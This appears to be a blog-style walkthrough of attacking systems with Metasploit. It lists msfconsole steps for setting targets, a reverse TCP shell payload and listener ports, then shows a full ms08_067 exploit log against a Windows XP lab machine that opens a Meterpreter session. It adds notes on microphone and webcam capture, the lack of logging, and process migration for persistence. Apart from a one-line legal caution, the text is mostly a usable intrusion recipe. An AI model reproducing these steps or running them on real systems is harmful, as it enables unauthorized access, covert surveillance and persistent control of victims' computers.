1. Get a Linux computer with metasploit installed. (Or get Kali Linux – AKA Backtrack)
2. Open a root shell and enter #service postgresql start
3. #msfconsole
4. msf >show exploits – to view all contained in the current database
5. msf >search unreal  – to see all exploits of unreal game servers
6. msf >use name_of_exploit_u_want
-msf >show options – to view options related to the exploit
-msf >back – to exit out of selected exploit
8. msf >host madunix.com – select the host. It will show you the IP Address
– nmap is supported from within the msfconsole. Try #nmap -sV 1.2.3.4 to view version of listening services.
9. msf >set RHOST 1.2.3.4
10. msf> set PAYLOAD windows/shell/reverse_tcp
11. msf > set LHOSTS to local host IP – Assuming you want any return traffic to go elsewhere
12. msf > set LPORT to set remote or local port – Set local source port. Good for navigating firewalls
13. #exploit (or run) to carry out the sploit
14. msf >sessions – to show current sessions
15. msf >sessions -i <ID> (From above) to open that exploit session.

Fun stuff but don’t point these tools at other peoples’ systems or you can be liable for damage and/or criminal charges.

Anyhow, here’s a sample attack sequence on a Windows XP SP2 box, default install

msf exploit(ms08_067_netapi) > set rhost 10.0.1.17
rhost => 10.0.1.17
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.0.1.48:4444
[*] 10.0.1.17:445 – Automatically detecting the target…
[*] 10.0.1.17:445 – Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] 10.0.1.17:445 – Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 10.0.1.17:445 – Attempting to trigger the vulnerability…
[*] Sending stage (957999 bytes) to 10.0.1.17
[*] Meterpreter session 1 opened (10.0.1.48:4444 -> 10.0.1.17:1064) at 2017-02-19 03:29:59 -0500

meterpreter >

meterpreter > This means you have a meterpreter shell on the remote target and if you hit ?, you’ll see a lot of options like record_mic, webcam_snap to capture audio or do a screencap with the web cam. (Saves files to operator’s desktop as .wav or .avi files.)

Most commands native to a Windows computer are possible here and a lot others.

This attack was carried out on an XP2 Virtual Machine and operated until I turned the firewall on and the session died with a blunt message:
[*] 10.0.1.17 – Meterpreter session 1 closed.  Reason: Died

Interestingly, during this whole process, not one single Windows log file reflected the incident. Stunning that security logging is disabled by default on “Our most advanced and secure release yet”. wow.

Lastly, one of the most interesting capabilities of the meterpreter shell in metasploit foundation is how you can hit ps to get a list of running processes and use the migrate command to hop to another process. (Move the exploit payload code from the initial process memory region into a different memory region of another process.)

You’ll want to select a stable process like Explorer.exe or svshost.exe to ensure you stay connected because the system won’t run without those services running.

I selected selected a separate instance of svchost.exe by PID and the meterpreter shell died. It happens.